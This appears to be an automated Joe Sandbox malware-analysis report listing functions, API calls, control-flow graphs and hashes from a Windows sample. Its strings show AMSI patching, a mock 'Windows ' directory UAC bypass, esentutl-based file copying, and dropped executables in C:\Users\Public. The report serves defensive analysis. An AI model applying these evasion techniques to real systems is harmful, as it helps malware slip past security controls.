                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                        • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                        • API String ID: 2171786310-3926298568
                                                                                                                        • Opcode ID: a2477d2258ba79bbae112ca07f0f59678f3cc11b1de6acb6f5071494d9907241
                                                                                                                        • Instruction ID: 5d17fc8293c0e1639ec5b22a5b8f722d0079df229f2cb19de2a0e3deeb1c717b
                                                                                                                        • Opcode Fuzzy Hash: a2477d2258ba79bbae112ca07f0f59678f3cc11b1de6acb6f5071494d9907241
                                                                                                                        • Instruction Fuzzy Hash: A443FA34A0026DCBDB52EB64DC80ADEB3BAFF85304F5040E69409AB714DE74AE95DF61
                                                                                                                        Function 02D4E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 9257 2d4e678-2d4e67c 9258 2d4e681-2d4e686 9257->9258 9258->9258 9259 2d4e688-2d4ec81 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34740 * 2 call 2d34860 call 2d34778 call 2d330d4 call 2d346d4 * 2 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34740 call 2d37f2c call 2d349a0 call 2d34d74 call 2d34df0 call 2d34740 call 2d349a0 call 2d34d74 call 2d34df0 call 2d48788 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c 9258->9259 9462 2d4ec87-2d4eedd call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 call 2d34860 call 2d349a0 call 2d346d4 call 2d347ec call 2d349a0 call 2d346d4 call 2d489d0 WaitForSingleObject CloseHandle * 2 call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c call 2d34860 call 2d349a0 call 2d347ec call 2d349a0 call 2d4894c * 3 9259->9462 9463 2d4eee2-2d4ef2f call 2d34500 call 2d34c60 call 2d34500 call 2d34c60 call 2d34500 9259->9463 9462->9463
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                          • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
                                                                                                                          • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
                                                                                                                          • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
                                                                                                                          • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C,OpenSession,02DB7380), ref: 02D4ED6E
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C,OpenSession), ref: 02D4ED76
                                                                                                                        • CloseHandle.KERNEL32(000008C0,00000000,00000000,000000FF,ScanString,02DB7380,02D4EF4C,OpenSession,02DB7380,02D4EF4C,UacScan,02DB7380,02D4EF4C,ScanBuffer,02DB7380,02D4EF4C), ref: 02D4ED7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                        • String ID: )"C:\Users\Public\Libraries\lxpbyalD.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                        • API String ID: 3475578485-3759695608
                                                                                                                        • Opcode ID: 100ed2d228e55004a3c03e74a1c72d45006d09ce716efd960cc7b0c6038e8153
                                                                                                                        • Instruction ID: 5e4aa6970c72dbb0d55e67bdeda94560efd26eec68fd264f9bcf27734ecb611a
                                                                                                                        • Opcode Fuzzy Hash: 100ed2d228e55004a3c03e74a1c72d45006d09ce716efd960cc7b0c6038e8153
                                                                                                                        • Instruction Fuzzy Hash: 0422EE74A00159ABEB52FB64D881BCEB3B6FF95300F5042A5A005EB354DF38AE458F76
                                                                                                                        Function 02D31724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 11426 2d31724-2d31736 11427 2d31968-2d3196d 11426->11427 11428 2d3173c-2d3174c 11426->11428 11431 2d31973-2d31984 11427->11431 11432 2d31a80-2d31a83 11427->11432 11429 2d317a4-2d317ad 11428->11429 11430 2d3174e-2d3175b 11428->11430 11429->11430 11437 2d317af-2d317bb 11429->11437 11433 2d31774-2d31780 11430->11433 11434 2d3175d-2d3176a 11430->11434 11435 2d31986-2d319a2 11431->11435 11436 2d31938-2d31945 11431->11436 11438 2d31684-2d316ad VirtualAlloc 11432->11438 11439 2d31a89-2d31a8b 11432->11439 11445 2d31782-2d31790 11433->11445 11446 2d317f0-2d317f9 11433->11446 11442 2d31794-2d317a1 11434->11442 11443 2d3176c-2d31770 11434->11443 11447 2d319b0-2d319bf 11435->11447 11448 2d319a4-2d319ac 11435->11448 11436->11435 11444 2d31947-2d3195b Sleep 11436->11444 11437->11430 11449 2d317bd-2d317c9 11437->11449 11440 2d316df-2d316e5 11438->11440 11441 2d316af-2d316dc call 2d31644 11438->11441 11441->11440 11444->11435 11453 2d3195d-2d31964 Sleep 11444->11453 11450 2d317fb-2d31808 11446->11450 11451 2d3182c-2d31836 11446->11451 11455 2d319c1-2d319d5 11447->11455 11456 2d319d8-2d319e0 11447->11456 11454 2d31a0c-2d31a22 11448->11454 11449->11430 11457 2d317cb-2d317de Sleep 11449->11457 11450->11451 11460 2d3180a-2d3181e Sleep 11450->11460 11461 2d318a8-2d318b4 11451->11461 11462 2d31838-2d31863 11451->11462 11453->11436 11463 2d31a24-2d31a32 11454->11463 11464 2d31a3b-2d31a47 11454->11464 11455->11454 11458 2d319e2-2d319fa 11456->11458 11459 2d319fc-2d319fe call 2d315cc 11456->11459 11457->11430 11466 2d317e4-2d317eb Sleep 11457->11466 11467 2d31a03-2d31a0b 11458->11467 11459->11467 11460->11451 11469 2d31820-2d31827 Sleep 11460->11469 11475 2d318b6-2d318c8 11461->11475 11476 2d318dc-2d318eb call 2d315cc 11461->11476 11470 2d31865-2d31873 11462->11470 11471 2d3187c-2d3188a 11462->11471 11463->11464 11472 2d31a34 11463->11472 11473 2d31a49-2d31a5c 11464->11473 11474 2d31a68 11464->11474 11466->11429 11469->11450 11470->11471 11478 2d31875 11470->11478 11479 2d318f8 11471->11479 11480 2d3188c-2d318a6 call 2d31500 11471->11480 11472->11464 11481 2d31a5e-2d31a63 call 2d31500 11473->11481 11482 2d31a6d-2d31a7f 11473->11482 11474->11482 11483 2d318ca 11475->11483 11484 2d318cc-2d318da 11475->11484 11485 2d318fd-2d31936 11476->11485 11489 2d318ed-2d318f7 11476->11489 11478->11471 11479->11485 11480->11485 11481->11482 11483->11484 11484->11485
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?,02D32000), ref: 02D317D0
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?,02D32000), ref: 02D317E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 39e80eecf6e81f540e5b1d9e0a706842d1d0c150a02d391f31fde70a450d1acb
                                                                                                                        • Instruction ID: f0e677849dc0c0cde6ead42d42ff219a1aa07926d64c15698b8a6b8a3283ff88
                                                                                                                        • Opcode Fuzzy Hash: 39e80eecf6e81f540e5b1d9e0a706842d1d0c150a02d391f31fde70a450d1acb
                                                                                                                        • Instruction Fuzzy Hash: 23B11276A00252CBCB17CF68E8A4355BBE1FB86315F1986AED45D8B386C770DC51CBA0
                                                                                                                        Function 02D488B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(amsi), ref: 02D488C1
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02D48920
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                        • String ID: DllGetClassObject$W$amsi
                                                                                                                        • API String ID: 941070894-2671292670
                                                                                                                        • Opcode ID: 33430faf3c9f475d162792b5d828f66a15da6b06b22e8af17551101993559341
                                                                                                                        • Instruction ID: adb670d7bbf0e6c128c50b1818cba5826152616e4f1cdf237623c117fbf34ded
                                                                                                                        • Opcode Fuzzy Hash: 33430faf3c9f475d162792b5d828f66a15da6b06b22e8af17551101993559341
                                                                                                                        • Instruction Fuzzy Hash: 5AF08C5044C781BAE201E2748C49F4BBACD8B622A4F008A58B1A89A3D2DA79D5059BB7
                                                                                                                        Function 02D31A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 11514 2d31a8c-2d31a9b 11515 2d31aa1-2d31aa5 11514->11515 11516 2d31b6c-2d31b6f 11514->11516 11519 2d31aa7-2d31aae 11515->11519 11520 2d31b08-2d31b11 11515->11520 11517 2d31b75-2d31b7f 11516->11517 11518 2d31c5c-2d31c60 11516->11518 11521 2d31b81-2d31b8d 11517->11521 11522 2d31b3c-2d31b49 11517->11522 11525 2d31c66-2d31c6b 11518->11525 11526 2d316e8-2d3170b call 2d31644 VirtualFree 11518->11526 11523 2d31ab0-2d31abb 11519->11523 11524 2d31adc-2d31ade 11519->11524 11520->11519 11527 2d31b13-2d31b27 Sleep 11520->11527 11529 2d31bc4-2d31bd2 11521->11529 11530 2d31b8f-2d31b92 11521->11530 11522->11521 11528 2d31b4b-2d31b5f Sleep 11522->11528 11531 2d31ac4-2d31ad9 11523->11531 11532 2d31abd-2d31ac2 11523->11532 11534 2d31af3 11524->11534 11535 2d31ae0-2d31af1 11524->11535 11544 2d31716 11526->11544 11545 2d3170d-2d31714 11526->11545 11527->11519 11536 2d31b2d-2d31b38 Sleep 11527->11536 11528->11521 11537 2d31b61-2d31b68 Sleep 11528->11537 11538 2d31b96-2d31b9a 11529->11538 11541 2d31bd4-2d31bd9 call 2d314c0 11529->11541 11530->11538 11540 2d31af6-2d31b03 11534->11540 11535->11534 11535->11540 11536->11520 11537->11522 11542 2d31bdc-2d31be9 11538->11542 11543 2d31b9c-2d31ba2 11538->11543 11540->11517 11541->11538 11542->11543 11547 2d31beb-2d31bf2 call 2d314c0 11542->11547 11549 2d31bf4-2d31bfe 11543->11549 11550 2d31ba4-2d31bc2 call 2d31500 11543->11550 11548 2d31719-2d31723 11544->11548 11545->11548 11547->11543 11553 2d31c00-2d31c28 VirtualFree 11549->11553 11554 2d31c2c-2d31c59 call 2d31560 11549->11554
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000,?), ref: 02D31B17
                                                                                                                        • Sleep.KERNEL32(0000000A,00000000,?), ref: 02D31B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3472027048-0
                                                                                                                        • Opcode ID: 631dcbe4d0d497e3166ed2f11d303dfdeba3448a2ffcc6c4a348ade1bdd33514
                                                                                                                        • Instruction ID: 69553dd5e85564f938a7edf85014dc8f9aa4df3be20f772125dbf861e9738e70
                                                                                                                        • Opcode Fuzzy Hash: 631dcbe4d0d497e3166ed2f11d303dfdeba3448a2ffcc6c4a348ade1bdd33514
                                                                                                                        • Instruction Fuzzy Hash: 5A51BD716052428FDB17CF68C9947A6BBE0EF46324F1885AED448CB382E7B0CC45CBA1
                                                                                                                        Function 02D4E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D4E5F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CheckConnectionInternet
                                                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                        • API String ID: 3847983778-3852638603
                                                                                                                        • Opcode ID: b5c8e47f977d91f1a1919916ac9c091cd7356e7ba9c8ff699aa817a66a83cf52
                                                                                                                        • Instruction ID: f73884ba20e7926f5018a5cdb5eb09964e9fb603caa42bc5579f5de4544241a0
                                                                                                                        • Opcode Fuzzy Hash: b5c8e47f977d91f1a1919916ac9c091cd7356e7ba9c8ff699aa817a66a83cf52
                                                                                                                        • Instruction Fuzzy Hash: 0141FF35B11188ABEB02EBA4E841ADEB3FAFF88700F504825E045E7351DE78AD058F75
                                                                                                                        Function 02D485BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: b653e59767e051fc11a57b8a96d1cb17d4ab7cf9687606437dea4c166c7cf033
                                                                                                                        • Instruction ID: 03d0404a92317dd7785ee39d110fafeb3b93a81275b33785681ca5e53cce7d88
                                                                                                                        • Opcode Fuzzy Hash: b653e59767e051fc11a57b8a96d1cb17d4ab7cf9687606437dea4c166c7cf033
                                                                                                                        • Instruction Fuzzy Hash: E3013172B84284FFFB42EFA4EC51F5A77EDEB49B40F514460B900D6740DA74AD109A35
                                                                                                                        Function 02D485BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • WinExec.KERNEL32(?,?), ref: 02D48624
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$Exec
                                                                                                                        • String ID: Kernel32$WinExec
                                                                                                                        • API String ID: 2292790416-3609268280
                                                                                                                        • Opcode ID: 7b2a24769406966e9e3f494b9f8710d9480c0caf274cb9b8ca0eadc8c6293cca
                                                                                                                        • Instruction ID: ed804a8122d7167a86572864160e46d7ab64307f34c282d65f8b8a3ea0bccd3a
                                                                                                                        • Opcode Fuzzy Hash: 7b2a24769406966e9e3f494b9f8710d9480c0caf274cb9b8ca0eadc8c6293cca
                                                                                                                        • Instruction Fuzzy Hash: A7F03172A84284EFEB42EFA4EC51F5A77ADEB49B40F514460B900D6740DA74AD109A35
                                                                                                                        Function 02D45C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45C88
                                                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45CB6
                                                                                                                          • Part of subcall function 02D37D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02D43900,02D45CF6,00000000,02D45D74,?,?,02D43900), ref: 02D37DAA
                                                                                                                          • Part of subcall function 02D37F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02D43900,02D45D11,00000000,02D45D74,?,?,02D43900,00000001), ref: 02D37FB7
                                                                                                                        • GetLastError.KERNEL32(00000000,02D45D74,?,?,02D43900,00000001), ref: 02D45D1B
                                                                                                                          • Part of subcall function 02D3A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02D3C3D9,00000000,02D3C433), ref: 02D3A797
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
